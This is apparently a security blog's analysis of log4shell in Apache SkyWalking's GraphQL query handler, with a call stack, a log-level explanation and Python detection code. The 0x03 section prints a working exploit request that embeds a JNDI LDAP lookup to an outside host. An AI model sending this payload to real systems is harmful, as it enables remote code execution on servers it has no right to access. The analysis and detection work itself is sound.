Vulnerability Analysis | log4shell in Apache SkyWalking


Original · 杂七 · 杂七杂八聊安全 · 2025-04-15 00:02


0x01 Trigger point location

graphql.GraphQL#parseAndValidate

Call stack:

parseAndValidate:504, GraphQL (graphql)
lambda$parseValidateAndExecute$3:494, GraphQL (graphql)
apply:-1, 981677561 (graphql.GraphQL$$Lambda$140)
get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed)
parseValidateAndExecute:490, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:763, ServletHolder (org.eclipse.jetty.servlet)
doHandle:551, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:489, ServletHandler (org.eclipse.jetty.servlet)
nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1278, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:127, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:500, Server (org.eclipse.jetty.server)
lambda$handle$1:383, HttpChannel (org.eclipse.jetty.server)
dispatch:-1, 1312317880 (org.eclipse.jetty.server.HttpChannel$$Lambda$137)
dispatch:547, HttpChannel (org.eclipse.jetty.server)
handle:375, HttpChannel (org.eclipse.jetty.server)
onFillable:273, HttpConnection (org.eclipse.jetty.server)
succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:103, FillInterest (org.eclipse.jetty.io)
run:117, ChannelEndPoint$2 (org.eclipse.jetty.io)
runTask:336, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
doProduce:313, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
tryProduce:171, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:129, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:375, ReservedThreadExecutor$ReservedThread (org.eclipse.jetty.util.thread)
runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread)
run:745, Thread (java.lang)

0x02 Why only this point triggers

In org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled the log level is checked first, and of the candidate points only the one above is a log.warn call.

The other points are LOGGER.debug calls. When the call reaches org.apache.logging.log4j.core.Logger.PrivateConfig#filter, the level required by the configuration file is INFO (intLevel 400), while the level passed in is DEBUG (intLevel 500); since 400 is less than 500, the filter returns false.

As a result, org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled never proceeds to org.apache.logging.log4j.spi.AbstractLogger#logMessage for those calls, so the message is never logged.

0x03 Request packet

POST /graphql HTTP/1.1
Host: 127.0.0.1:12800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 444
Origin: http://x.x.x.x:8059
DNT: 1
Connection: close
Referer: http://x.x.x.x:8059/
{
"query":"query queryLogs($condition: LogQueryCondition) {
queryLogs(condition: $condition) {
total
logs {
serviceId
${jndi:ldap://192.168.22.33:1389/basic/base64/b3BlbiAtYSBDYWxjdWxhdG9yCg==}
serviceName
isError
content
}
}
}
",
"variables":{
"condition":{
"metricName":"test",
"state":"ALL",
"paging":{
"pageSize":10
}
}
}
}
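The following is an added example, not code from the original post or from SkyWalking or Log4j. It models two things the post describes: the level gate in Logger.PrivateConfig#filter (using the intLevel values Log4j 2 assigns to its standard levels, so a WARN call passes an INFO configuration while a DEBUG call does not), and a defender-side scan of a GraphQL request body for Log4j lookup patterns such as the one in the packet above. The request bodies, the LDAP_HOST_PLACEHOLDER host and the function names are constructed for this example.

```python
"""Added example (not from the original post): a model of the Log4j 2 level gate
plus a scanner for Log4j lookup patterns in a GraphQL request body."""
import json
import re

# intLevel values of Log4j 2's standard levels (org.apache.logging.log4j.Level).
LOG4J_INT_LEVEL = {
    "OFF": 0, "FATAL": 100, "ERROR": 200, "WARN": 300,
    "INFO": 400, "DEBUG": 500, "TRACE": 600, "ALL": 2**31 - 1,
}


def log_call_enabled(configured_level: str, call_level: str) -> bool:
    """Model of Logger.PrivateConfig#filter: a call is enabled when the
    configured intLevel is >= the call's intLevel. With the post's INFO (400)
    configuration, LOGGER.warn (300) passes and LOGGER.debug (500) does not."""
    return LOG4J_INT_LEVEL[configured_level] >= LOG4J_INT_LEVEL[call_level]


# A Log4j lookup has the shape ${prefix:...}; "jndi" is the prefix behind log4shell.
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z0-9_-]+)\s*:[^}]*\}")


def find_lookups(text: str) -> list[str]:
    """Return the lower-cased lookup prefixes found in text, e.g. ['jndi']."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(text)]


def scan_graphql_body(body: str) -> dict:
    """Walk every string in the JSON request body (query and variables)
    and report which lookup prefixes occur and whether a JNDI lookup is present."""
    found: list[str] = []

    def walk(node):
        if isinstance(node, str):
            found.extend(find_lookups(node))
        elif isinstance(node, dict):
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(json.loads(body))
    return {"lookups": found, "jndi": "jndi" in found}


def lookup_would_fire(body: str, configured_level: str = "INFO",
                      call_level: str = "WARN") -> bool:
    """Combine both checks: the request carries a JNDI lookup AND the statement
    that logs the request text is enabled at the configured level. In the post,
    the only enabled statement is the log.warn in GraphQL#parseAndValidate."""
    return scan_graphql_body(body)["jndi"] and log_call_enabled(configured_level, call_level)


# Constructed sample modeled on the post's packet; the LDAP host is a placeholder.
SAMPLE_BODY = json.dumps({
    "query": "query queryLogs($condition: LogQueryCondition) { queryLogs(condition: $condition) "
             "{ total logs { serviceId ${jndi:ldap://LDAP_HOST_PLACEHOLDER:1389/x} serviceName } } }",
    "variables": {"condition": {"metricName": "test", "state": "ALL", "paging": {"pageSize": 10}}},
})

# Constructed benign request for comparison.
BENIGN_BODY = json.dumps({
    "query": "query queryLogs($condition: LogQueryCondition) { queryLogs(condition: $condition) { total } }",
    "variables": {"condition": {"metricName": "test"}},
})

if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(name, scan_graphql_body(body), "fires at INFO/WARN:",
              lookup_would_fire(body, "INFO", "WARN"))
    print("debug call enabled at INFO config:", log_call_enabled("INFO", "DEBUG"))
```

The level gate only decides which statements run; it is not a protection, because any enabled statement that logs attacker-controlled text is enough. Log4j 2.16.0 and later disable message lookups and JNDI access by default, which removes the sink regardless of log level; the scanner above is useful as a detection signal on request logs in the meantime.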

END


Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; the author and this account accept no legal or joint liability. Please take note!
